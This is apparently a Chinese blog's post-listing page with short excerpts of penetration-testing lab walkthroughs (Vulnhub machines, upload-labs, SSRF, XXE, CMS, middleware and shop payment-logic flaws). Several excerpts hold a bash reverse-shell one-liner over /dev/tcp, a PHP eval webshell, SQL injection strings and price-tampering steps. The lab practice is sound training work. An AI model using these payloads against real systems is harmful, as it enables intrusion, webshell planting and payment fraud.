- 博客(21)
- 收藏
- 关注
原创 vulnhub中deathnote1靶机
靶机开机后,按e键进入安全模式修改下图两个位置为ens33注意x是删除i是输入然后退出打开kali识别存活主机(也就是识别攻击目标):端口扫描:发现22端口和80端口,分别对应ssh协议和http协议ps:常见端口号21 tcp FTP 文件传输协议22 tcp SSH 安全登录、文件传送(SCP)和端口重定向 (xshell)23 tcp Telnet 不安全的文本传送80 tcp HTTP 超文本传送协议(www)
2025-01-08 19:01:04
1023
原创 Vulnhub靶场Who Wants To Be King 1
查看此文件,显示出一个txt文件的路径,查看这个note.txt文件,显示出一段信息。通过Google,对这段信息进行搜索,成功搜索到完整的信息,这个。跳转到此文件的完整路径后,发现有个压缩包,解压后出现一个名为。命令查看不需要密码就可以通过root执行的文件信息。命令查看当前目录下的所有文件,可以看到有个命名为。对乱码进行解密转成明文,这个有可能是靶机的密码。换一种方法进行收集信息,退回到之前的目录,通过。进入root目录,通过查询命令得到靶机的flag。使用nmap对IP进行扫描,获取开放的端口服务。
2025-01-07 19:24:58
276
原创 vulhub中earth靶场
进行解密得到密码为earthclimatechangebad4humans,用户名terra。,80端口400错误,443端口也没什么用,回到80端口,4可以绑定域名,然后访问域名试试。访问三个端口,分别访问80和。登录进去进行监听,成功。
2025-01-06 16:53:39
186
原创 常见框架漏洞
JBoss 5.x/6.x反序列化命令执行漏洞(CVE-2017-12149)创建一个php文件改后缀为.jpg,抓包并在jpg后边添加一个空格。使用shiro反序列化漏洞综合利用工具 v2.2进行访问。然后抓取数据包,使用PATCH请求来修改。加poc进行发送,并进到容器进行访问。放行,然后访问路径,用bp进行抓包。搭建环境进行访问并用bp进行抓包。填写注册信息然后用bp进行抓包。搭建环境,访问靶场,证明存在接口。进行反弹shell并执行。访问,进行远程代码执行。进行漏洞利用,反弹成功。
2025-01-05 20:27:32
215
原创 vulnhub中ica靶场
成功获取到两个有用的账户名和密码:travis/DJceVy98W28Y7wLg、dexter/7ZwV4qtg42cmUXGX。使用xshell连接。将数据库中的用户名与密码 写到两个文件中进行爆破。发现可利用漏洞,可得数据密码信息。针对80端口收集网站信息。查询该系统版本的相关漏洞。输入用户名密码进入数据库。密码需要base64位解密。中获得一些密码信息,基于。发现80 端口有东西。得到两个用户名与密码。中获得管理员账号密码。
2025-01-05 17:54:54
239
原创 常见中间件漏洞
搭建靶场打开网站,进行抓包桌面创建一个jsp文件 可以用哥斯拉工具生成一个jsp代码抓包后修改提交方式,并将jsp代码复制到抓包后发送去访问jsp文件成功上传去哥斯拉工具测试连接1.2 后台弱口令部署war包重新搭建环境上传war文件访问成功连接成功搭建环境使用m命令进行测试。
2025-01-01 22:28:59
2409
原创 未授权访问漏洞
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆。http://localhost:9200/_river/_search 查看数据库敏感信息。http://localhost:9200/_plugin/head/ web管理界⾯。http://localhost:9200/_nodes 查看节点数据。http://ip:2375/version #查看版本信息。在kali中使用以下命令进行未授权访问漏洞测试。
2024-12-31 01:13:37
857
原创 [Vulnhub靶机] DriftingBlues: 6保姆教程
dirsearch -u "http://192.168.81.128/"(改成自己的IP)尝试了多次得到 robots.txt 文件和 textpattern 目录有用。工具将压缩文件的密码转换为hash格式输出到 hash.txt 文件中,使用。工具重新扫描靶机网站目录,并添加.zip扩展名。命令扫描网段内存活的主机,以获取靶机IP。打开robots.txx发现两个信息。根据上面得到的第一个信息得到这个页面。得到一个压缩包并且需要密码。得到了密码myspace4。打开页面是空白可能是对了。
2024-12-29 19:38:03
841
原创 常⻅CMS漏洞
文件上传是2.php内容也是一句话木马打开网站是空白说明成功了。系统然后sql命令工具写入下面的一句木马就会在我们的根目录下生成。登陆成功后这个页面新建文件1.php内容就是一句话木马。修改主页文件为index.php可以成功。通过后台sql命令执⾏拿webshell。点保存抓包并修改抓包里要修改的位置。打开网站一定要记得修改大写为小写。后台任意命令执⾏拿WebShell。后台修改模板拿WebShell。修改模板⽂件拿WebShell。我们打开网站就会看到成功了。后台修改配置⽂件拿Shell。
2024-12-29 17:41:56
370
原创 【Vulnhub靶场】EMPIRE: LUPINONE
dirb http://192.168.234.128:80(换成你们自己的IP地址)你好朋友,我很高兴你找到了我的秘密目录,我这样创建的,以与你分享我的ssh私钥文件,我们继续尝试,就是暗示我们还有别的文件夹,我们使用wfuzz扫描一下。它就藏在这里的某个地方,这样黑客就不会找到它,用快速通道破解我的密码。找到robots.txt打开有一个/~myfiles继续打开看看。密码就是我们刚刚得到的密码:P@55w0rd!就可以看到我们的密码:P@55w0rd!(我的IP变是因为我换了WiFi!
2024-12-27 20:58:48
428
原创 vulnhub jangow靶场攻略
在蚁剑输入bash -c 'bash -i >& /dev/tcp/192.168.2.141/443 0>&1'php eval($_POST["cmd"]);到这个界面后 删除recovery nomodeset只删除这个后面的要给人家保留然后在后面添加。把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali现在是NAT模式。系统启动时(⻓按shift键)直到显示以下界⾯ ,我们选第二个!kali就可以监听到输入ls就能看到了。依旧选第二个但是这次选中后按e。将⽹卡信息设置为ens33。
2024-12-26 17:24:18
305
原创 cmseasy和大米cms的金额支付逻辑漏洞
进入到页面后随便点一个产品把数量改为负的这样然后继续随便写一个然后继续这里记得选余额然后你就能看到我们的余额变了然后我们再来买选择余额成功后打开后台一笔订单是0商家不会看会以为没支付支付是成功就会发货了。
2024-12-26 17:00:57
144
原创 VULNHUB靶场morpheus保姆级通关
打开后有个图片,没有什么可以传参的地方,接着对前端代码看了一下,没有什么有价值的东西。得到graffiti.php和txt的两个文件我们打开php的页面发现有输入框。81端口进去发现输入框,尝试输入东西后让重新输入,前端代码也无法打开。输入XSS反射的js代码抓包然后把下图圈起来的位置改成我这样。看看graffiti.txt发现能收到我们输入的东西。接着我们用御剑扫描一下端口发现都没有什么用。发现22,80,81三个端口。输入XSS反射的js代码有弹窗。发送打开后发现是空白。地址改为你自己的IP。
2024-12-25 17:42:58
1277
原创 漏洞复现与技能树的Bypass disable_function
在你的宝塔终端启动命令docker ps查看我的是8983打开后长这样打开DNSlog点最上边左边这个按钮获取一个域名来监控我们注⼊的效果n}复制这个代码放到你上面进入的那个网站的这个位置复制DNSlog中获取的域名也放到下图蓝色选中的位置回到DNSlog点击最上面右边的刷新就能得到回显如下图把这个指令进行base64编码地址是你宝塔的地址端口号你可以任意写一个复制这个代码放到你的宝塔终端红色位置改为你刚base64解码的得到的东西黄色位置改为你的宝塔IP。
2024-12-24 22:48:46
445
原创 niushop前后端漏洞寻找
1.点进来后复制网址打开kali输入下图的代码然后一直y然后在输入一次下图指令就可以得到下图这样就是正确了2.随便点一个商品点击购买抓包后修改下图光标处0.00000001放行然后这个页面下图光标处也是修改为0.00000001就可以看到这个页面为0.00金额继续放行付款成功就是成功了3.随便修改一个昵称和真实姓名然后在抓包工具里右击鼠标选择相关工具里的生成csrf Poc然后点击右下角复制html在www目录下新建一个1.html内容就是刚刚复制的内容。
2024-12-23 20:15:41
284
原创 ⽂件解析漏洞
然后在浏览器输入完整后去掉2.jpg后面的g然后抓包修改成我下面的样子2.jpg空格空格.php。2. 在C:/inetput/wwwroot下创建一个1.asp.jpg文件内容和上一个内容一样。打开网站后上传文件会出现地址然后修改6.php.jpg为shell.php会出现空白就成功了。然后我们去蚁剑地址址就是上图的网址密码就是1.jpg里的参数就会显示连接成功。打开网址后选择文件然后要记得抓包然后在下图的jpg的后面加个空格。然后输入如下的地址,地址也是你自己的虚拟机IP。
2024-12-21 18:29:31
394
原创 hackme靶场与Tomato靶场渗透测试实战
1、主机发现2.登录主页发现登录页面,而且还可以注册用户3. 点击 Sign up now 注册用户admin 密码1234564. 登录admin用户 单击search可以进行查看到很多的书名5. 验证sql注入 Windows OS' and 1=1#得到如图:验证出此处存在字符型(单引号)sql注入7. 判断字段数 Windows OS' order by 3#判断出来字段数是3个9.判断显示位置10. 查看当前数据库位置。
2024-12-20 20:58:28
547
原创 upload-labs详解1-19关通关全解
创建一个文本文档1.php或者什么都行内容如下:<?php @eval($_POST[cmd]);?>Pass-1.上传文件打开任务管理器扎熬到这个位置删掉然后上传即可 Pass-2.上传一个1.php文件,用burp抓包用burp抓包然后修改文件的类型然后放行即可(得不到多点几遍放行)Pass-3.把文件名改为1.php3就可以上传成功 Pass-4.这一关需要先上传一个后缀为.htaccess的文件内容为:AddType application/x-httpd-php .png然后吧1.php修改为1.
2024-12-19 20:30:00
683
原创 查找flag与xxe破解
2.10可以看到 JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5,这串代码也是进行了加密,我们再进行解密,他的加密方式是base32 (一般MD5加密是32位,base64加密末尾都有等于号,没有等于号的可能是base32加密,严格意义上说是编码),将其解码看一下。2.14解码以后,我们发现看不懂,但是我们知道他是php文件,可能是php代码,新建一个php文件到小皮的www下,将代码写进去,访问一下。2.6解码之后,我们可以发现有账号密码,但是密码用MD5进行了加密,解密一下。
2024-12-18 21:51:16
1341
原创 SSRF通关
3.1启动让dp拦截后添加数值开始攻击找到端口回到网址输入扫描到的网址即可。7.3编译完后复制然后会一直转删掉输入shell.php得到如下。6.1做图下操作黄色是一句话木马base64编码之后的。7.4打开中国菜刀复制网址打开以下位置就可以了。6.4进入中国菜刀找下图位置 点进去就能得到。5.1选中文件修改如下图增加一个提交按钮。7.2得到的编码要用ctf在线工具编译。4.1打开网址鼠标右击打开页面代码。然后ctf编码提交即可。6.2得到如图所得就是对的。4.2dp拦截到并修改。5.2bp拦截 并修改。
2024-12-18 17:20:26
179
空空如也
区块链我想要一个好一点的参考参考
2023-10-14
TA创建的收藏夹 TA关注的收藏夹
TA关注的人